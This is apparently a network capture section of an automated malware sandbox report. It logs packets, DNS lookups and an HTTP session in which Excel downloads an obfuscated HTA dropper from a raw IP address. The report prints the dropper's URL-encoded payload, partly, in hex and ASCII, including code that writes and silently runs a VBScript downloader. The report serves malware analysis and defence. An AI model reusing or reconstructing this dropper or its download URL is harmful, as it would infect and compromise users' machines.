                                    Mar 26, 2025 19:36:23.583707094 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.583744049 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.583909988 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.608800888 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.608827114 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.608936071 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.608936071 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.608948946 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.609178066 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.627059937 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.627108097 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.627213001 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.627233028 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.627258062 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.627557039 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.646733999 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.646755934 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.646871090 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.646883011 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.646928072 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.666745901 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.666764021 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.666820049 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.666836023 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.666876078 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.667000055 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.695904970 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.695920944 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.696017981 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.696042061 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.696089029 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.710640907 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.710658073 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.710731983 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.710741997 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.710808992 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.710808992 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.732886076 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.732903957 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.732948065 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.732959032 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.733016968 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.753139973 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.753163099 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.753211021 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.753220081 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.753251076 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.753278017 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.774415970 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.774440050 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.774571896 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.774601936 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.774691105 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.796402931 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.796423912 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.796492100 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.796500921 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.796618938 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.812194109 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.812211990 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.812285900 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.812297106 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.812334061 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.833004951 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.833024979 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.833093882 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.833108902 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.833193064 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.850419044 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.850450039 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.850804090 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.850812912 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.850922108 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.871716022 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.871748924 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.871815920 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.871824980 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.871850967 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.871920109 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.894808054 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.894834995 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.894917965 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.894932032 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.895005941 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.910254002 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.910280943 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.910438061 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.910438061 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.910449982 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.910497904 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.926512957 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.926544905 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.926610947 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.926624060 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.926673889 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.945060968 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.945095062 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.945197105 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.945197105 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.945208073 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.945271969 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.966379881 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.966409922 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.966614962 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.966634035 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.966705084 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.986838102 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.986860991 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.986913919 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:23.986929893 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:23.986994028 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.001266956 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.001291037 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.001363993 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.001375914 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.001396894 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.001543999 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.017959118 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.017990112 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.018038034 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.018057108 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.018096924 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.018120050 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.031568050 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.031589031 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.031636953 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.031647921 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.031703949 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.052136898 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.052160978 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.052278996 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.052290916 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.052397013 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.073276043 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.073302031 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.073455095 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.073455095 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.073467970 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.073570967 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.089654922 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.089689016 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.089761019 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.089771032 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.089799881 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.089869976 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.105614901 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.105648994 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.105731964 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.105743885 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.105799913 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.105799913 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.118633986 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.118658066 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.118732929 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.118740082 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.118766069 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.118783951 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.136410952 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.136435032 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.136485100 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.136495113 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.136635065 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.153213978 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.153234005 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.153302908 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.153314114 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.153387070 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.173028946 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.173046112 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.173088074 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.173104048 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.173140049 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.173222065 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.187433958 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.187454939 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.187589884 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.187596083 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.187716007 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.204122066 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.204139948 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.204205990 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.204211950 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.204221964 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.204272032 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.204534054 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.204556942 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:24.204596996 CET49699443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:24.204611063 CET4434969913.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.508064985 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.508099079 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.508274078 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.508779049 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.508797884 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.508852005 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.508898020 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.508929014 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.509044886 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.509058952 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.783529043 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.787704945 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.787746906 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.788681030 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.789319992 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.789340973 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.790143013 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.790148973 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.790271997 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.790288925 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.962882042 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.962903976 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.962975025 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.963001966 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.963135004 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.963238955 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.968693018 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.968705893 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.968789101 CET49700443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.968806028 CET4434970013.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.972918987 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.972985029 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.973054886 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.973488092 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.973501921 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:36:28.973512888 CET49701443192.168.2.713.107.246.41
                                    Mar 26, 2025 19:36:28.973517895 CET4434970113.107.246.41192.168.2.7
                                    Mar 26, 2025 19:37:05.563457012 CET4969880192.168.2.7172.245.123.32
                                    Mar 26, 2025 19:37:05.662100077 CET8049698172.245.123.32192.168.2.7
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 26, 2025 19:35:50.271025896 CET5357626162.159.36.2192.168.2.7
                                    Mar 26, 2025 19:36:06.577140093 CET5892953192.168.2.71.1.1.1
                                    Mar 26, 2025 19:36:06.897918940 CET53589291.1.1.1192.168.2.7
                                    Mar 26, 2025 19:36:21.956835032 CET5503153192.168.2.71.1.1.1
                                    Mar 26, 2025 19:36:22.044965029 CET53550311.1.1.1192.168.2.7

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Mar 26, 2025 19:36:06.577140093 CET192.168.2.71.1.1.10x827cStandard query (0)agr.myA (IP address)IN (0x0001)false
                                    Mar 26, 2025 19:36:21.956835032 CET192.168.2.71.1.1.10x2f0fStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Mar 26, 2025 19:35:17.638459921 CET1.1.1.1192.168.2.70xfb33No error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 26, 2025 19:35:17.638459921 CET1.1.1.1192.168.2.70xfb33No error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 26, 2025 19:35:17.638459921 CET1.1.1.1192.168.2.70xfb33No error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                                    Mar 26, 2025 19:35:17.638459921 CET1.1.1.1192.168.2.70xfb33No error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                                    Mar 26, 2025 19:36:06.897918940 CET1.1.1.1192.168.2.70x827cNo error (0)agr.my147.79.86.93A (IP address)IN (0x0001)false
                                    Mar 26, 2025 19:36:22.044965029 CET1.1.1.1192.168.2.70x2f0fNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 26, 2025 19:36:22.044965029 CET1.1.1.1192.168.2.70x2f0fNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 26, 2025 19:36:22.044965029 CET1.1.1.1192.168.2.70x2f0fNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 26, 2025 19:36:22.044965029 CET1.1.1.1192.168.2.70x2f0fNo error (0)shed.dual-low.s-part-0013.t-0009.t-msedge.nets-part-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 26, 2025 19:36:22.044965029 CET1.1.1.1192.168.2.70x2f0fNo error (0)s-part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • agr.my
                                    • otelrules.svc.static.microsoft
                                    • 172.245.123.32

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749698172.245.123.32806532C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    Mar 26, 2025 19:36:07.867646933 CET251OUTGET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Host: 172.245.123.32
                                    Mar 26, 2025 19:36:07.968348980 CET1031INHTTP/1.1 200 OK
                                    Date: Wed, 26 Mar 2025 18:36:07 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 26 Mar 2025 17:58:33 GMT
                                    ETag: "17d1-6314295f8a8a9"
                                    Accept-Ranges: bytes
                                    Content-Length: 6097
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/hta
                                    Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 6b 69 73 73 6d 65 2e 74 6b 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 32 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 30 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 34 35 25 37 38 25 36 35 25 36 33 25 37 35 25 37 34 25 36 31 25 37 32 25 32 30 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 43 25 32 46 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 34 38 25 35 34 25 34 31 25 33 41 25 34 31 25 35 [TRUNCATED]
                                    Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by kissme.tk -->...document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%45%78%65%63%75%74%61%72%20%53%63%72%69%70%74%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%48%54%41%3A%41%50%50%4C%49%43%41%54%49%4F%4E%20%0A%20%20%20%20%20%20%20%20%41%50%50%4C%49%43%41%54%49%4F%4E%4E%41%4D%45%3D%22%53%63%72%69%70%74%45%78%65%63%75%74%6F%72%22%0A%20%20%20%20%20%20%20%20%42%4F%52%44%45%52%3D%22%6E%6F%6E%65%22%0A%20%20%20%20%20%20%20%20%43%41%50%54%49%4F%4E%3D%22%6E%6F%22%0A%20%20%20%20%20%20%20%20%53%48%4F%57%49%4E%54%41%53%4B%42%41%52%3D%22%6E%6F%22%0A%20%20%20
                                    Mar 26, 2025 19:36:07.968364000 CET1031INData Raw: 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 33 25 34 39 25 34 45 25 34 37 25 34 43 25 34 35 25 34 39 25 34 45 25 35 33 25 35 34 25 34 31 25 34 45 25 34 33 25 34 35 25 33 44 25 32 32 25 37 39 25 36 35 25 37 33 25 32 32 25 30 41 25 32 30 25
                                    Data Ascii: %20%20%20%20%20%53%49%4E%47%4C%45%49%4E%53%54%41%4E%43%45%3D%22%79%65%73%22%0A%20%20%20%20%20%20%20%20%57%49%4E%44%4F%57%53%54%41%54%45%3D%22%6D%69%6E%69%6D%69%7A%65%22%0A%20%20%20%20%2F%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%6C%61%6E%67%75
                                    Mar 26, 2025 19:36:07.968379974 CET1031INData Raw: 34 25 32 38 25 32 32 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 36 39 25 36 45 25 36 37 25 32 45 25 34 36 25 36 39 25 36 43 25 36 35 25 35 33 25 37 39 25 37 33 25 37 34 25 36 35 25 36 44 25 34 46 25 36 32 25 36 41 25 36 35 25 36 33
                                    Data Ascii: 4%28%22%53%63%72%69%70%74%69%6E%67%2E%46%69%6C%65%53%79%73%74%65%6D%4F%62%6A%65%63%74%22%29%0A%20%20%20%20%20%20%20%20%53%65%74%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%20%3D%20%63%6F%6D%6D%69%74%74%65%65%73%2E%43%72%65%61%74%65%54%65%78%74%4
                                    Mar 26, 2025 19:36:07.968391895 CET1031INData Raw: 37 34 25 36 31 25 36 45 25 36 31 25 37 33 25 32 45 25 37 36 25 36 32 25 37 33 25 32 32 25 32 32 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 33 25 37 30 25 36 35 25 36 33 25 37 34 25 37 32 25 36
                                    Data Ascii: 74%61%6E%61%73%2E%76%62%73%22%22%22%0A%20%20%20%20%20%20%20%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%2E%57%72%69%74%65%4C%69%6E%65%20%22%65%63%68%6F%20%44%69%6D%20%6E%6F%6E%63%61%74%61%6C%6F%67%2C%20%64%6F%63%75%6D%65%6E%74%61%72%69%73%74%20%
                                    Mar 26, 2025 19:36:07.968480110 CET1031INData Raw: 25 37 33 25 37 34 25 32 45 25 36 46 25 37 30 25 36 35 25 36 45 25 32 30 25 32 32 25 32 32 25 34 37 25 34 35 25 35 34 25 32 32 25 32 32 25 32 43 25 32 30 25 36 45 25 36 46 25 36 45 25 36 33 25 36 31 25 37 34 25 36 31 25 36 43 25 36 46 25 36 37 25
                                    Data Ascii: %73%74%2E%6F%70%65%6E%20%22%22%47%45%54%22%22%2C%20%6E%6F%6E%63%61%74%61%6C%6F%67%2C%20%46%61%6C%73%65%20%3E%3E%20%25%66%75%67%75%65%73%25%22%0A%20%20%20%20%20%20%20%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%2E%57%72%69%74%65%4C%69%6E%65%20%22
                                    Mar 26, 2025 19:36:07.968491077 CET1031INData Raw: 36 25 32 30 25 33 45 25 33 45 25 32 30 25 32 35 25 36 36 25 37 35 25 36 37 25 37 35 25 36 35 25 37 33 25 32 35 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 33 25 37 30 25 36 35 25 36 33 25 37 34
                                    Data Ascii: 6%20%3E%3E%20%25%66%75%67%75%65%73%25%22%0A%20%20%20%20%20%20%20%20%73%70%65%63%74%72%6F%67%72%61%70%68%73%2E%57%72%69%74%65%4C%69%6E%65%20%22%73%74%61%72%74%20%22%22%22%22%20%2F%62%20%77%73%63%72%69%70%74%20%2F%2F%6E%6F%6C%6F%67%6F%20%22%22%2
